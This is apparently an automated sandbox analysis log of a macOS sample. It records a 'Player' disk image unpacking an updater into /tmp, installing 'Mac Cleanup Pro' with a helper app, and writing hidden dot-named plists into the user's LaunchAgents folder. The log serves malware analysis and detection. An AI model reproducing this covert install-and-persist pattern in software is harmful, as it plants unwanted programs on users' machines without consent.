Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/he.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Info.plist	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nb.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nb.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nb.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nb.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pl.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_BR.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt_PT.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/SUModelTranslation.plist	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/SUStatus.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/uk.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_CN.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/Sparkle.strings	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/zh_TW.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Sparkle	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory symbolic link created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Resources -> Versions/Current/Resources	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory symbolic link created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Sparkle -> Versions/Current/Sparkle	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory symbolic link created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fr_CA.lproj -> fr.lproj	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory symbolic link created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/pt.lproj -> pt_BR.lproj	Jump to behavior
Source: /bin/cp (PID: 806)	Framework directory symbolic link created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/Current -> A	Jump to behavior

Creates application bundles containing icon files

Show sources

Source: /bin/cp (PID: 806)	Icon file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/AppIcon.icns			Jump to behavior
Source: /bin/cp (PID: 806)	Icon file created: /Applications/Mac Cleanup Pro.app/Contents/Resources/application.icns			Jump to behavior

Reads data from the local random generator

Show sources

Source: /usr/bin/osascript (PID: 778)

Random device file read: /dev/random

Jump to behavior

Uses AppleKeyboardLayouts bundle containing keyboard layouts

Show sources

Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 778)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist	Jump to behavior
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist	Jump to behavior
Source: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp (PID: 821)	AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist

Writes log files to disk

Show sources

Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Log file created: /Users/henry/Library/Caches/com.crashlytics.data/com.l.r.l.m/v3/active/4080d8ce448e4366aaf6a9a7a957c79d/sdk.log	Jump to dropped file
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Log file created: /Users/henry/Library/Caches/com.crashlytics.data/com.l.r.l.m/analytics/v2/events/760C7B8F-7B90-4DE6-B7FE-1CBFF3393F22.log	Jump to dropped file
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Log file created: /Users/henry/Library/Caches/com.crashlytics.data/com.l.r.l.m/analytics/v2/events/D9DE1C75-B81F-44E4-82B5-618E9826375D.log	Jump to dropped file
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	Log file created: /Users/henry/Library/Caches/com.crashlytics.data/com.l.r.l.m/analytics/v2/events/B7A1E2E9-496D-4B11-911D-60BB65A65CFD.log	Jump to dropped file
Source: /Applications/Mac Cleanup Pro.app/Contents/MacOS/Mac Cleanup Pro (PID: 809)	Log file created: /Users/henry/Library/Logs/Mac Cleanup Pro.log	Jump to dropped file
Source: /Users/henry/Library/Application Support/mcp/helpermcp.app/Contents/MacOS/helpermcp (PID: 821)	Log file created: /Users/henry/Library/Logs/helpermcp.log	Jump to dropped file

Writes property list (.plist) files to disk

Show sources

Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	XML plist file created: /Users/henry/Library/LaunchAgents/.dat.nosync02ed.9K4WCN	Jump to dropped file
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	XML plist file created: /Users/henry/Library/LaunchAgents/.dat.nosync02ed.vRm7qL	Jump to dropped file
Source: /Volumes/Player/Player.app/Contents/MacOS/Player (PID: 749)	XML plist file created: /Users/henry/Library/Application Support/com.l.r.l.m/com.crashlytics/.dat.nosync02ed.j46nBn	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	XML plist file created: /private/tmp/ddd/Updater.app/Contents/_CodeSignature/CodeResources	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	Binary plist file created: /private/tmp/ddd/Updater.app/Contents/Resources/MainMenu.nib	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	XML plist file created: /private/tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/A/_CodeSignature/CodeResources	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	XML plist file created: /private/tmp/ddd/Updater.app/Contents/Frameworks/Alamofire.framework/Versions/A/Resources/Info.plist	Jump to dropped file
Source: /usr/bin/unzip (PID: 776)	XML plist file created: /private/tmp/ddd/Updater.app/Contents/Info.plist	Jump to dropped file
Source: /bin/cp (PID: 806)	XML plist file created: /Applications/Mac Cleanup Pro.app/Contents/_CodeSignature/CodeResources	Jump to dropped file
Source: /bin/cp (PID: 806)	XML plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/_CodeSignature/CodeResources	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ar.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	XML plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/_CodeSignature/CodeResources	Jump to dropped file
Source: /bin/cp (PID: 806)	XML plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Info.plist	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/SUStatus.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/cs.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/el.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/el.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/el.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	XML plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/Info.plist	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUUpdateAlert.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ja.lproj/SUUpdatePermissionPrompt.nib	Jump to dropped file
Source: /bin/cp (PID: 806)	Binary plist file created: /Applications/Mac Cleanup Pro.app/Contents/Frameworks/Sparkle.framework/Versions/A/Resources/ko.lproj/SUAutomaticUpdateAlert.nib	Jump to dropped file
